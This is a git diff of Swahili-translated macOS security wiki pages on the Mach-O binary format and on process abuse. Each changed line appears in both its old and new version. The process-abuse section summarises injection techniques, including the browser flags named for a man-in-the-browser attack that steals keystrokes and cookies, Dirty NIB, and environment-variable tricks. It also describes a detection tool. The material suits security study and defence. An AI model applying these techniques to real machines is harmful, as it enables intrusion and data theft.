Kuna **aina tofauti** za sehemu, kama vile sehemu ya **\_\_TEXT**, ambayo ina kanuni inayoweza kutekelezwa ya programu, na sehemu ya **\_\_DATA**, ambayo ina data inayotumiwa na mchakato. Sehemu hizi **ziko katika sehemu ya data** ya faili la Mach-O.
Kuna **aina tofauti** za sehemu, kama vile **\_\_TEXT** sehemu, ambayo ina kanuni inayotekelezeka ya programu, na **\_\_DATA** sehemu, ambayo ina data inayotumiwa na mchakato. **Sehemu hizi ziko katika sehemu ya data** ya faili la Mach-O.
**Kila sehemu** inaweza kugawanywa zaidi katika **sehemu nyingi**. Muundo wa **amri ya kupakia** una **habari** kuhusu **sehemu hizi** ndani ya sehemu husika.
**Kila sehemu** inaweza kugawanywa zaidi katika **sehemu nyingi**. **Muundo wa amri ya kupakia** una **taarifa** kuhusu **sehemu hizi** ndani ya sehemu husika.
Katika kichwa kwanza unapata **kichwa cha sehemu**:
@ -188,7 +188,7 @@ Mfano wa kichwa cha sehemu:
<figure><img src="../../../images/image (1126).png" alt=""><figcaption></figcaption></figure>
Kichwa hiki kinaelezea **idadi ya sehemu ambazo vichwa vyake vinatokea baada** yake:
Kichwa hiki kinaelezea **idadi ya sehemu ambazo vichwa vyao vinatokea baada** yake:
```c
struct section_64 { /* for 64-bit architectures */
char sectname[16]; /* name of this section */
@ -219,16 +219,16 @@ otool -lv /bin/ls
```
Sehemu za kawaida zinazopakiwa na cmd hii:
- **`__PAGEZERO`:** Inamwambia kernel **kuweka** **anwani sifuri** ili **isiweze kusomwa, kuandikwa, au kutekelezwa**. Vigezo vya maxprot na minprot katika muundo vimewekwa kuwa sifuri kuashiria kuwa **hakuna haki za kusoma-kuandika-kutekeleza kwenye ukurasa huu**.
- Ugawaji huu ni muhimu ili **kupunguza hatari za dereference ya pointer ya NULL**. Hii ni kwa sababu XNU inatekeleza ukurasa sifuri mgumu ambao unahakikisha ukurasa wa kwanza (tu wa kwanza) wa kumbukumbu haupatikani (isipokuwa katika i386). Binafsi inaweza kutimiza mahitaji haya kwa kutengeneza kidogo \_\_PAGEZERO (kwa kutumia `-pagezero_size`) kufunika 4k za kwanza na kuwa na kumbukumbu ya 32bit iliyobaki inapatikana katika hali ya mtumiaji na kernel.
- **`__TEXT`**: Inashikilia **kanuni** **inayotekelezeka** yenye ruhusa za **kusoma** na **kutekeleza** (hakuna ya kuandika)**.** Sehemu za kawaida za segment hii:
- **`__PAGEZERO`:** Inamwambia kernel **kuweka** **anwani sifuri** ili **haiwezi kusomwa, kuandikwa, au kutekelezwa**. Vigezo vya maxprot na minprot katika muundo vimewekwa kuwa sifuri kuonyesha kuwa hakuna **haki za kusoma-kuandika-kutekeleza kwenye ukurasa huu**.
- Usambazaji huu ni muhimu ili **kupunguza hatari za dereference ya pointer ya NULL**. Hii ni kwa sababu XNU inatekeleza ukurasa sifuri mgumu ambao unahakikisha ukurasa wa kwanza (tu wa kwanza) wa kumbukumbu haupatikani (isipokuwa katika i386). Binafsi inaweza kutimiza mahitaji haya kwa kutengeneza kidogo \_\_PAGEZERO (kwa kutumia `-pagezero_size`) kufunika 4k za kwanza na kuwa na kumbukumbu ya 32bit iliyobaki inapatikana katika hali ya mtumiaji na kernel.
- **`__TEXT`**: Inashikilia **kanuni** **zinazotekelezwa** zikiwa na ruhusa za **kusoma** na **kutekeleza** (hakuna ya kuandika)**.** Sehemu za kawaida za segment hii:
- `__text`: Kanuni ya binary iliyokusanywa
- `__const`: Takwimu za kudumu (kusoma tu)
- `__[c/u/os_log]string`: C, Unicode au os logs string constants
- `__stubs` na `__stubs_helper`: Zina ushirika wakati wa mchakato wa upakiaji wa maktaba ya dynamic
- `__unwind_info`: Takwimu za kuondoa stack.
- Kumbuka kwamba maudhui haya yote yameandikwa lakini pia yamewekwa kama yanayoweza kutekelezwa (kuunda chaguzi zaidi za unyakuzi wa sehemu ambazo hazihitaji ruhusa hii, kama sehemu za maandiko).
- **`__DATA`**: Inashikilia data ambayo ni **inasomwa** na **inaweza kuandikwa** (hakuna inayoweza kutekelezwa)**.**
- Kumbuka kwamba maudhui haya yote yameandikwa lakini pia yamewekwa kama yanayotekelezwa (kuunda chaguzi zaidi za unyakuzi wa sehemu ambazo hazihitaji ruhusa hii, kama sehemu za maandiko).
- **`__DATA`**: Inashikilia data ambayo ni **inasomwa** na **inaandikwa** (hakuna inayotekelezwa)**.**
- `__got:` Meza ya Uhamisho wa Kimataifa
- `__nl_symbol_ptr`: Pointer ya alama isiyo lazi (bind wakati wa upakiaji)
- `__la_symbol_ptr`: Pointer ya alama ya lazi (bind wakati wa matumizi)
@ -238,10 +238,10 @@ Sehemu za kawaida zinazopakiwa na cmd hii:
- `__bss`: Vigezo vya kudumu (ambavyo havijaanzishwa)
- `__objc_*` (\_\_objc_classlist, \_\_objc_protolist, nk): Taarifa inayotumiwa na wakati wa Objective-C
- **`__DATA_CONST`**: \_\_DATA.\_\_const haikuhakikishiwa kuwa ya kudumu (ruhusa za kuandika), wala pointers nyingine na GOT. Sehemu hii inafanya `__const`, baadhi ya waanzilishi na meza ya GOT (mara tu inapohakikishwa) **kuwa ya kusoma tu** kwa kutumia `mprotect`.
- **`__LINKEDIT`**: Inashikilia taarifa kwa ajili ya linker (dyld) kama vile, alama, maandiko, na entries za meza ya uhamisho. Ni chombo cha jumla kwa maudhui ambayo hayapo katika `__TEXT` au `__DATA` na maudhui yake yanaelezewa katika amri nyingine za upakiaji.
- **`__LINKEDIT`**: Inashikilia taarifa kwa linker (dyld) kama vile, alama, maandiko, na entries za meza ya uhamisho. Ni chombo cha jumla kwa maudhui ambayo hayapo katika `__TEXT` au `__DATA` na maudhui yake yanaelezewa katika amri nyingine za upakiaji.
- taarifa za dyld: Rebase, Non-lazy/lazy/weak binding opcodes na taarifa za usafirishaji
- Kazi za kuanza: Meza ya anwani za kuanza za kazi
- Takwimu Katika Kanuni: Visiwa vya takwimu katika \_\_text
- Data Katika Kanuni: Visiwa vya data katika \_\_text
- Meza ya Alama: Alama katika binary
- Meza ya Alama ya Kando: Pointer/stub symbols
- Meza ya Mwandiko
@ -258,7 +258,7 @@ Kama ilivyokuwa inawezekana kuona katika kanuni, **sehemu pia zinaunga mkono ben
### **`LC_UNIXTHREAD/LC_MAIN`**
**`LC_MAIN`** ina kiingilio katika **sifa ya entryoff.** Wakati wa upakiaji, **dyld** kwa urahisi **inaongeza** thamani hii kwenye (katika kumbukumbu) **misingi ya binary**, kisha **inaenda** kwenye maagizo haya kuanza kutekeleza kanuni ya binary.
**`LC_MAIN`** ina kiingilio katika **sifa ya entryoff.** Wakati wa upakiaji, **dyld** kwa urahisi **inaongeza** thamani hii kwenye (katika kumbukumbu) **msingi wa binary**, kisha **inaenda** kwenye maagizo haya kuanza kutekeleza kanuni ya binary.
**`LC_UNIXTHREAD`** ina thamani ambazo register lazima iwe nazo wakati wa kuanzisha thread kuu. Hii tayari imeondolewa lakini **`dyld`** bado inaitumia. Inawezekana kuona thamani za register zilizowekwa na hii kwa:
```bash
@ -291,11 +291,11 @@ Hata hivyo, unaweza kupata taarifa fulani kuhusu sehemu hii katika [**hiki blogu
### **`LC_ENCRYPTION_INFO[_64]`**
Msaada wa usimbuaji wa binary. Hata hivyo, bila shaka, ikiwa mshambuliaji atafanikiwa kuathiri mchakato, ataweza kutupa kumbukumbu bila usimbuaji.
Msaada wa usimbaji wa binary. Hata hivyo, bila shaka, ikiwa mshambuliaji atafanikiwa kuathiri mchakato, ataweza kutoa kumbukumbu bila usimbaji.
### **`LC_LOAD_DYLINKER`**
Inashikilia **njia ya executable ya dynamic linker** inayopanga maktaba za pamoja katika nafasi ya anwani ya mchakato. **Thamani kila wakati imewekwa kwenye `/usr/lib/dyld`**. Ni muhimu kutambua kwamba katika macOS, ramani ya dylib inafanyika katika **mode ya mtumiaji**, si katika mode ya kernel.
Inashikilia **njia ya executable ya dynamic linker** inayopanga maktaba za pamoja katika nafasi ya anwani ya mchakato. **Thamani kila wakati imewekwa kwenye `/usr/lib/dyld`**. Ni muhimu kutambua kwamba katika macOS, uhamasishaji wa dylib unafanyika katika **mode ya mtumiaji**, si katika mode ya kernel.
### **`LC_IDENT`**
@ -303,7 +303,7 @@ Imepitwa na wakati lakini wakati imewekwa ili kuunda dumps wakati wa panic, dump
### **`LC_UUID`**
UUID ya nasibu. Ni muhimu kwa chochote moja kwa moja lakini XNU inahifadhi kwa pamoja na taarifa nyingine za mchakato. Inaweza kutumika katika ripoti za ajali.
UUID ya nasibu. Ni muhimu kwa chochote moja kwa moja lakini XNU inahifadhi pamoja na taarifa nyingine za mchakato. Inaweza kutumika katika ripoti za ajali.
### **`LC_DYLD_ENVIRONMENT`**
@ -350,7 +350,7 @@ Baadhi ya maktaba zinazohusiana na malware ni:
## **Data ya Mach-O**
Katika msingi wa faili kuna eneo la data, ambalo linajumuisha segment kadhaa kama ilivyoainishwa katika eneo la amri za kupakia. **Aina mbalimbali za sehemu za data zinaweza kuhifadhiwa ndani ya kila segment**, ambapo kila sehemu **inaweka msimbo au data** maalum kwa aina fulani.
Katika msingi wa faili kuna eneo la data, ambalo linajumuisha segment kadhaa kama ilivyoainishwa katika eneo la amri za kupakia. **Aina mbalimbali za sehemu za data zinaweza kuhifadhiwa ndani ya kila segment**, huku kila sehemu **ikiweka msimbo au data** maalum kwa aina fulani.
> [!TIP]
> Data kimsingi ni sehemu inayoshikilia **taarifa** zote zinazopakiwa na amri za kupakia **LC_SEGMENTS_64**
@ -373,19 +373,19 @@ size -m /bin/ls
```
## Sehemu za Kawaida za Objetive-C
Katika sehemu ya `__TEXT` (r-x):
Katika segmenti ya `__TEXT` (r-x):
- `__objc_classname`: Majina ya darasa (nyuzi)
- `__objc_methname`: Majina ya mbinu (nyuzi)
- `__objc_methtype`: Aina za mbinu (nyuzi)
Katika sehemu ya `__DATA` (rw-):
Katika segmenti ya `__DATA` (rw-):
- `__objc_classlist`: Viashiria kwa madarasa yote ya Objetive-C
- `__objc_nlclslist`: Viashiria kwa madarasa ya Objective-C yasiyo la Lazy
- `__objc_nlclslist`: Viashiria kwa madarasa ya Objective-C yasiyo na uvivu
- `__objc_catlist`: Kiashiria kwa Kategoria
- `__objc_nlcatlist`: Kiashiria kwa Kategoria zisizo la Lazy
- `__objc_protolist`: Orodha ya Protokali
- `__objc_nlcatlist`: Kiashiria kwa Kategoria zisizo na uvivu
- `__objc_protolist`: Orodha ya protokali
- `__objc_const`: Takwimu za kudumu
- `__objc_imageinfo`, `__objc_selrefs`, `objc__protorefs`...

86
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
View File

@ -23,7 +23,7 @@ Kisha **`posix_spawn`** ilianzishwa ikichanganya **`vfork`** na **`execve`** kat
Zaidi ya hayo, `posix_spawn` inaruhusu kufafanua array ya **`posix_spawnattr`** inayodhibiti baadhi ya vipengele vya mchakato ulioanzishwa, na **`posix_spawn_file_actions`** kubadilisha hali ya maelezo.
Wakati mchakato unakufa unatumia **kodikodi ya kurudi kwa mchakato mzazi** (ikiwa mzazi alikufa, mzazi mpya ni PID 1) kwa ishara `SIGCHLD`. Mzazi anahitaji kupata thamani hii kwa kuita `wait4()` au `waitid()` na hadi hiyo itokee mtoto unabaki katika hali ya zombie ambapo bado inatajwa lakini haiwezi kutumia rasilimali.
Wakati mchakato unakufa unatumia **kodikodi ya kurudi kwa mchakato mzazi** (ikiwa mzazi amekufa, mzazi mpya ni PID 1) kwa ishara `SIGCHLD`. Mzazi anahitaji kupata thamani hii kwa kuita `wait4()` au `waitid()` na hadi hiyo itokee mtoto unabaki katika hali ya zombie ambapo bado inatajwa lakini haiwezi kutumia rasilimali.
### PIDs
@ -32,17 +32,17 @@ PIDs, vitambulisho vya mchakato, vinatambulisha mchakato wa kipekee. Katika XNU
### Process Groups, Sessions & Coalations
**Michakato** inaweza kuingizwa katika **makundi** ili iwe rahisi kuzishughulikia. Kwa mfano, amri katika skripti ya shell zitakuwa katika kundi moja la mchakato hivyo inawezekana **kuziashiria pamoja** kwa kutumia kill kwa mfano.\
Pia inawezekana **kundi michakato katika vikao**. Wakati mchakato unaanzisha kikao (`setsid(2)`), michakato ya watoto inawekwa ndani ya kikao, isipokuwa wanapoanzisha kikao chao wenyewe.
Pia inawezekana **kundi michakato katika vikao**. Wakati mchakato unaanzisha kikao (`setsid(2)`), michakato ya watoto inawekwa ndani ya kikao, isipokuwa waanzishe kikao chao wenyewe.
Coalition ni njia nyingine ya kuunganisha michakato katika Darwin. Mchakato unaojiunga na coalation unaruhusu kufikia rasilimali za pool, kushiriki ledger au kukabiliana na Jetsam. Coalations zina majukumu tofauti: Kiongozi, huduma ya XPC, Kiongezi.
### Credentials & Personae
Kila mchakato una **credentials** ambazo **zinatambulisha ruhusa zake** katika mfumo. Kila mchakato utakuwa na `uid` moja ya msingi na `gid` moja ya msingi (ingawa inaweza kuwa katika makundi kadhaa).\
Pia inawezekana kubadilisha kitambulisho cha mtumiaji na kikundi ikiwa binary ina **`setuid/setgid`** bit.\
Pia inawezekana kubadilisha kitambulisho cha mtumiaji na kikundi ikiwa binary ina `setuid/setgid` bit.\
Kuna kazi kadhaa za **kweka uids/gids mpya**.
Syscall **`persona`** inatoa seti ya **credentials** **mbadala**. Kupitisha persona kunachukua uid yake, gid na uanachama wa kikundi **kwa pamoja**. Katika [**source code**](https://github.com/apple/darwin-xnu/blob/main/bsd/sys/persona.h) inawezekana kupata struct:
Syscall **`persona`** inatoa seti **mbadala** ya **credentials**. Kupitisha persona kunachukua uid yake, gid na ushirikiano wa makundi **kwa pamoja**. Katika [**source code**](https://github.com/apple/darwin-xnu/blob/main/bsd/sys/persona.h) inawezekana kupata struct:
```c
struct kpersona_info { uint32_t persona_info_version;
uid_t persona_id; /* overlaps with UID */
@ -65,7 +65,7 @@ char persona_name[MAXLOGNAME + 1];
#### Thread Termination in macOS
1. **Exiting Threads:** Nyuzi kwa kawaida zinamalizika kwa kuita `pthread_exit()`. Kazi hii inaruhusu nyuzi kutoka kwa usafi, ikifanya usafi unaohitajika na kuruhusu nyuzi kutuma thamani ya kurudi kwa wanachama wowote.
1. **Exiting Threads:** Nyuzi kwa kawaida zinamalizika kwa kuita `pthread_exit()`. Kazi hii inaruhusu nyuzi kutoka kwa usafi, ikifanya usafi unaohitajika na kuruhusu nyuzi kutuma thamani ya kurudi kwa waunganishaji wowote.
2. **Thread Cleanup:** Wakati wa kuita `pthread_exit()`, kazi ya `pthread_terminate()` inaitwa, ambayo inashughulikia kuondoa muundo wote wa nyuzi zinazohusiana. Inafuta bandari za nyuzi za Mach (Mach ni mfumo wa mawasiliano katika kernel ya XNU) na inaita `bsdthread_terminate`, wito wa mfumo unaondoa muundo wa kiwango cha kernel unaohusiana na nyuzi.
#### Synchronization Mechanisms
@ -100,7 +100,7 @@ void main (int argc, char **argv){
tlv_var = 10;
}
```
Hii sehemu inaelezea `tlv_var` kama variable ya thread-local. Kila thread inayotumia hii code itakuwa na `tlv_var` yake mwenyewe, na mabadiliko ambayo thread moja inafanya kwa `tlv_var` hayataathiri `tlv_var` katika thread nyingine.
Hii sehemu inaelezea `tlv_var` kama variable ya thread-local. Kila thread inayokimbia msimbo huu itakuwa na `tlv_var` yake mwenyewe, na mabadiliko ambayo thread moja inafanya kwa `tlv_var` hayataathiri `tlv_var` katika thread nyingine.
Katika binary ya Mach-O, data inayohusiana na variable za thread-local imepangwa katika sehemu maalum:
@ -127,113 +127,113 @@ Kuelewa kipaumbele cha thread kunahusisha kuangalia jinsi mfumo wa uendeshaji un
Daraja la QoS ni njia ya kisasa zaidi ya kushughulikia kipaumbele cha thread, hasa katika mifumo kama macOS inayounga mkono **Grand Central Dispatch (GCD)**. Daraja la QoS linawawezesha waendelezaji **kugawanya** kazi katika viwango tofauti kulingana na umuhimu au dharura yao. macOS inasimamia kipaumbele cha thread kiotomatiki kulingana na daraja hizi za QoS:
1. **Mtu Anayeingiliana:**
- Daraja hili ni kwa kazi ambazo kwa sasa zinaingiliana na mtumiaji au zinahitaji matokeo ya haraka ili kutoa uzoefu mzuri wa mtumiaji. Kazi hizi zinapewa kipaumbele cha juu ili kuweka kiolesura kuwa na majibu (mfano, michoro au usimamizi wa matukio).
- Daraja hili ni kwa kazi ambazo kwa sasa zinaingiliana na mtumiaji au zinahitaji matokeo ya haraka ili kutoa uzoefu mzuri wa mtumiaji. Kazi hizi zinapewa kipaumbele cha juu ili kuweka kiolesura kuwa na majibu (kwa mfano, michoro au usimamizi wa matukio).
2. **Mtu Aliyeanzisha:**
- Kazi ambazo mtumiaji anazianzisha na anatarajia matokeo ya haraka, kama kufungua hati au kubonyeza kitufe kinachohitaji hesabu. Hizi ni za kipaumbele cha juu lakini chini ya mtu anayeingiliana.
3. **Huduma:**
- Kazi hizi ni za muda mrefu na kwa kawaida zinaonyesha kiashiria cha maendeleo (mfano, kupakua faili, kuingiza data). Ziko chini ya kipaumbele kuliko kazi zilizozinduliwa na mtumiaji na hazihitaji kumalizika mara moja.
- Kazi hizi ni za muda mrefu na kwa kawaida zinaonyesha kiashiria cha maendeleo (kwa mfano, kupakua faili, kuingiza data). Ziko chini ya kipaumbele kuliko kazi zilizozinduliwa na mtumiaji na hazihitaji kumalizika mara moja.
4. **Nyuma:**
- Daraja hili ni kwa kazi zinazofanya kazi nyuma na hazionekani kwa mtumiaji. Hizi zinaweza kuwa kazi kama kuorodhesha, kusawazisha, au nakala za akiba. Zina kipaumbele cha chini na athari ndogo kwenye utendaji wa mfumo.
Kwa kutumia daraja la QoS, waendelezaji hawahitaji kusimamia nambari za kipaumbele sahihi bali wanazingatia asili ya kazi, na mfumo unaboresha rasilimali za CPU ipasavyo.
Kwa kutumia daraja la QoS, waendelezaji hawahitaji kusimamia nambari za kipaumbele sahihi bali badala yake wanazingatia asili ya kazi, na mfumo unaboresha rasilimali za CPU ipasavyo.
Zaidi ya hayo, kuna **sera tofauti za kupanga thread** ambazo zinaelekeza kuweka seti ya vigezo vya kupanga ambavyo mpangaji utachukua katika kuzingatia. Hii inaweza kufanywa kwa kutumia `thread_policy_[set/get]`. Hii inaweza kuwa na manufaa katika mashambulizi ya hali ya mbio.
Zaidi ya hayo, kuna sera tofauti za **ratiba za thread** ambazo zinaelekeza kuweka seti ya vigezo vya ratiba ambavyo ratibu itachukua katika kuzingatia. Hii inaweza kufanywa kwa kutumia `thread_policy_[set/get]`. Hii inaweza kuwa na manufaa katika mashambulizi ya hali ya mbio.
## MacOS Process Abuse
## Unyanyasaji wa Mchakato wa MacOS
MacOS, kama mfumo mwingine wowote wa uendeshaji, inatoa mbinu na mitambo mbalimbali kwa **michakato kuingiliana, kuwasiliana, na kushiriki data**. Ingawa mbinu hizi ni muhimu kwa utendaji mzuri wa mfumo, zinaweza pia kutumiwa vibaya na wahalifu kufanya **shughuli mbaya**.
MacOS, kama mfumo mwingine wowote wa uendeshaji, inatoa njia na mitambo mbalimbali kwa **michakato kuingiliana, kuwasiliana, na kushiriki data**. Ingawa mbinu hizi ni muhimu kwa utendaji mzuri wa mfumo, zinaweza pia kutumiwa vibaya na wahalifu wa mtandao ili **kufanya shughuli mbaya**.
### Library Injection
### Uingizaji wa Maktaba
Library Injection ni mbinu ambapo mshambuliaji **anamlazimisha mchakato kupakia maktaba mbaya**. Mara tu inapowekwa, maktaba inafanya kazi katika muktadha wa mchakato wa lengo, ikimpa mshambuliaji ruhusa na ufikiaji sawa na mchakato huo.
Uingizaji wa Maktaba ni mbinu ambapo mshambuliaji **anamlazimisha mchakato kupakia maktaba mbaya**. Mara tu inapowekwa, maktaba inakimbia katika muktadha wa mchakato wa lengo, ikimpa mshambuliaji ruhusa na ufikiaji sawa na mchakato huo.
{{#ref}}
macos-library-injection/
{{#endref}}
### Function Hooking
### Kuingilia Kazi
Function Hooking inahusisha **kuingilia simu za kazi** au ujumbe ndani ya msimbo wa programu. Kwa kuingilia kazi, mshambuliaji anaweza **kubadilisha tabia** ya mchakato, kuangalia data nyeti, au hata kupata udhibiti juu ya mtiririko wa utekelezaji.
Kuingilia Kazi kunahusisha **kuingilia simu za kazi** au ujumbe ndani ya msimbo wa programu. Kwa kuingilia kazi, mshambuliaji anaweza **kubadilisha tabia** ya mchakato, kuangalia data nyeti, au hata kupata udhibiti juu ya mtiririko wa utekelezaji.
{{#ref}}
macos-function-hooking.md
{{#endref}}
### Inter Process Communication
### Mawasiliano ya Kati ya Mchakato
Inter Process Communication (IPC) inarejelea mbinu tofauti ambazo michakato tofauti **zinashiriki na kubadilishana data**. Ingawa IPC ni muhimu kwa maombi mengi halali, inaweza pia kutumiwa vibaya kuondoa kutengwa kwa mchakato, kuvuja taarifa nyeti, au kufanya vitendo visivyoidhinishwa.
Mawasiliano ya Kati ya Mchakato (IPC) inarejelea mbinu tofauti ambazo michakato tofauti **zinashiriki na kubadilishana data**. Ingawa IPC ni muhimu kwa programu nyingi halali, inaweza pia kutumiwa vibaya kuharibu kutengwa kwa mchakato, kuvuja taarifa nyeti, au kufanya vitendo visivyoidhinishwa.
{{#ref}}
macos-ipc-inter-process-communication/
{{#endref}}
### Electron Applications Injection
### Uingizaji wa Maombi ya Electron
Electron applications zinazotekelezwa na variables maalum za env zinaweza kuwa hatarini kwa mchakato wa kuingiza:
Maombi ya Electron yanayoendeshwa na vigezo maalum vya mazingira yanaweza kuwa hatarini kwa uingizaji wa mchakato:
{{#ref}}
macos-electron-applications-injection.md
{{#endref}}
### Chromium Injection
### Uingizaji wa Chromium
Inawezekana kutumia bendera `--load-extension` na `--use-fake-ui-for-media-stream` kufanya **shambulio la mtu katikati ya kivinjari** linaloruhusu kuiba funguo za kuandika, trafiki, cookies, kuingiza scripts kwenye kurasa...:
Inawezekana kutumia bendera `--load-extension` na `--use-fake-ui-for-media-stream` kufanya **shambulio la mtu katikati ya kivinjari** linaloruhusu kuiba funguo za kuandika, trafiki, vidakuzi, kuingiza skripti kwenye kurasa...:
{{#ref}}
macos-chromium-injection.md
{{#endref}}
### Dirty NIB
### NIB Chafu
NIB files **zinaelezea vipengele vya kiolesura cha mtumiaji (UI)** na mwingiliano wao ndani ya programu. Hata hivyo, zinaweza **kutekeleza amri zisizo na mipaka** na **Gatekeeper haizuii** programu iliyotekelezwa tayari kutekelezwa ikiwa **faili ya NIB imebadilishwa**. Kwa hivyo, zinaweza kutumika kufanya programu zisizo na mipaka kutekeleza amri zisizo na mipaka:
Faili za NIB **zinaelezea vipengele vya kiolesura cha mtumiaji (UI)** na mwingiliano wao ndani ya programu. Hata hivyo, zinaweza **kutekeleza amri zisizo na mipaka** na **Gatekeeper haizuii** programu iliyotekelezwa tayari kutekelezwa ikiwa **faili ya NIB imebadilishwa**. Kwa hivyo, zinaweza kutumika kufanya programu zisizo na mipaka kutekeleza amri zisizo na mipaka:
{{#ref}}
macos-dirty-nib.md
{{#endref}}
### Java Applications Injection
### Uingizaji wa Maombi ya Java
Inawezekana kutumia uwezo fulani wa java (kama vile **`_JAVA_OPTS`** env variable) kufanya programu ya java kutekeleza **msimbo/amri zisizo na mipaka**.
Inawezekana kutumia uwezo fulani wa java (kama vile **`_JAVA_OPTS`** vigezo vya mazingira) kufanya programu ya java kutekeleza **amri/msimbo zisizo na mipaka**.
{{#ref}}
macos-java-apps-injection.md
{{#endref}}
### .Net Applications Injection
### Uingizaji wa Maombi ya .Net
Inawezekana kuingiza msimbo katika programu za .Net kwa **kuitumia kazi ya ufuatiliaji wa .Net** (siyo iliyo na ulinzi wa ulinzi wa macOS kama vile kuimarisha wakati wa utekelezaji).
Inawezekana kuingiza msimbo katika maombi ya .Net kwa **kuitumia kazi ya ufuatiliaji wa .Net** (siyo iliyo na ulinzi wa ulinzi wa macOS kama vile kuimarisha wakati wa utekelezaji).
{{#ref}}
macos-.net-applications-injection.md
{{#endref}}
### Perl Injection
### Uingizaji wa Perl
Angalia chaguzi tofauti za kufanya script ya Perl kutekeleza msimbo zisizo na mipaka katika:
Angalia chaguzi tofauti za kufanya skripti za Perl kutekeleza msimbo usio na mipaka katika:
{{#ref}}
macos-perl-applications-injection.md
{{#endref}}
### Ruby Injection
### Uingizaji wa Ruby
Pia inawezekana kutumia variables za env za ruby kufanya scripts zisizo na mipaka kutekeleza msimbo zisizo na mipaka:
Pia inawezekana kutumia vigezo vya mazingira vya ruby kufanya skripti zisizo na mipaka kutekeleza msimbo usio na mipaka:
{{#ref}}
macos-ruby-applications-injection.md
{{#endref}}
### Python Injection
### Uingizaji wa Python
Ikiwa variable ya mazingira **`PYTHONINSPECT`** imewekwa, mchakato wa python utaingia kwenye cli ya python mara tu unapomaliza. Pia inawezekana kutumia **`PYTHONSTARTUP`** kuashiria script ya python kutekelezwa mwanzoni mwa kikao cha mwingiliano.\
Hata hivyo, kumbuka kwamba script ya **`PYTHONSTARTUP`** haitatekelezwa wakati **`PYTHONINSPECT`** inaunda kikao cha mwingiliano.
Ikiwa vigezo vya mazingira **`PYTHONINSPECT`** vimewekwa, mchakato wa python utaingia kwenye cli ya python mara tu unapomaliza. Pia inawezekana kutumia **`PYTHONSTARTUP`** kuashiria skripti ya python kutekelezwa mwanzoni mwa kikao cha mwingiliano.\
Hata hivyo, kumbuka kwamba skripti ya **`PYTHONSTARTUP`** haitatekelezwa wakati **`PYTHONINSPECT`** inaunda kikao cha mwingiliano.
Variables nyingine za mazingira kama **`PYTHONPATH`** na **`PYTHONHOME`** pia zinaweza kuwa na manufaa kufanya amri ya python kutekeleza msimbo zisizo na mipaka.
Vigezo vingine vya mazingira kama **`PYTHONPATH`** na **`PYTHONHOME`** vinaweza pia kuwa na manufaa kufanya amri ya python kutekeleza msimbo usio na mipaka.
Kumbuka kwamba executable zilizokusanywa na **`pyinstaller`** hazitatumia hizi variables za mazingira hata kama zinakimbia kwa kutumia python iliyojumuishwa.
Kumbuka kwamba executable zilizokusanywa na **`pyinstaller`** hazitatumia vigezo hivi vya mazingira hata kama zinakimbia kwa kutumia python iliyojumuishwa.
> [!CAUTION]
> Kwa ujumla sikuweza kupata njia ya kufanya python kutekeleza msimbo zisizo na mipaka kwa kutumia variables za mazingira.\
> Kwa ujumla, sikuweza kupata njia ya kufanya python itekeleze msimbo usio na mipaka kwa kutumia vigezo vya mazingira.\
> Hata hivyo, watu wengi huweka python kwa kutumia **Hombrew**, ambayo itainstall python katika **mahali pa kuandika** kwa mtumiaji wa kawaida wa admin. Unaweza kuiteka nyara kwa kitu kama:
>
> ```bash
@ -252,12 +252,12 @@ Kumbuka kwamba executable zilizokusanywa na **`pyinstaller`** hazitatumia hizi v
### Shield
[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) ni programu ya chanzo wazi ambayo inaweza **gundua na kuzuia vitendo vya kuingiza mchakato**:
[**Shield**](https://theevilbit.github.io/shield/) ([**Github**](https://github.com/theevilbit/Shield)) ni programu ya chanzo wazi inayoweza **gundua na kuzuia uingizaji wa mchakato**:
- Kutumia **Variables za Mazingira**: Itasimamia uwepo wa yoyote ya variables za mazingira zifuatazo: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** na **`ELECTRON_RUN_AS_NODE`**
- Kutumia **`task_for_pid`** calls: Ili kupata wakati mchakato mmoja unataka kupata **task port ya mwingine** ambayo inaruhusu kuingiza msimbo katika mchakato.
- **Paramu za programu za Electron**: Mtu anaweza kutumia **`--inspect`**, **`--inspect-brk`** na **`--remote-debugging-port`** kama hoja za mstari wa amri kuanzisha programu ya Electron katika hali ya ufuatiliaji, na hivyo kuingiza msimbo ndani yake.
- Kutumia **symlinks** au **hardlinks**: Kwa kawaida, matumizi mabaya ya kawaida ni **kweka kiungo na ruhusa zetu za mtumiaji**, na **kuashiria mahali pa juu ya ruhusa**. Ugunduzi ni rahisi sana kwa hardlink na symlinks. Ikiwa mchakato unaounda kiungo una **kiwango tofauti cha ruhusa** na faili ya lengo, tunaunda **onyo**. Kwa bahati mbaya katika kesi ya symlinks kuzuia haiwezekani, kwani hatuna taarifa kuhusu marudio ya kiungo kabla ya kuundwa. Hii ni kikomo cha mfumo wa EndpointSecurity wa Apple.
- Kutumia **Vigezo vya Mazingira**: Itasimamia uwepo wa yoyote ya vigezo vya mazingira vifuatavyo: **`DYLD_INSERT_LIBRARIES`**, **`CFNETWORK_LIBRARY_PATH`**, **`RAWCAMERA_BUNDLE_PATH`** na **`ELECTRON_RUN_AS_NODE`**
- Kutumia **`task_for_pid`** simu: Ili kupata wakati mchakato mmoja unataka kupata **bandari ya kazi ya mwingine** ambayo inaruhusu kuingiza msimbo katika mchakato.
- **Paramu za maombi ya Electron**: Mtu anaweza kutumia **`--inspect`**, **`--inspect-brk`** na **`--remote-debugging-port`** hoja za mstari wa amri kuanzisha programu ya Electron katika hali ya ufuatiliaji, na hivyo kuingiza msimbo ndani yake.
- Kutumia **symlinks** au **hardlinks**: Kwa kawaida, unyanyasaji wa kawaida ni **kweka kiungo na ruhusa zetu za mtumiaji**, na **kuashiria mahali pa juu ya ruhusa**. Ugunduzi ni rahisi sana kwa hardlink na symlinks. Ikiwa mchakato unaounda kiungo una **kiwango tofauti cha ruhusa** na faili lengwa, tunaunda **onyo**. Kwa bahati mbaya katika kesi ya symlinks, kuzuia haiwezekani, kwani hatuna taarifa kuhusu marudio ya kiungo kabla ya kuundwa. Hii ni kikomo cha mfumo wa EndpointSecurity wa Apple.
### Simu zinazofanywa na michakato mingine

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
View File

@ -2,7 +2,7 @@
{{#include ../../../banners/hacktricks-training.md}}
